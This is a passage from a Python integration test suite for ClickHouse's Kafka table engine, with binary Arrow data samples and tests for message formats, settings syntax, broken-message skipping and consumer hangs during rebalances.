\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:{} --describe --members --group old --verbose".format(cluster.kafka_port)))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
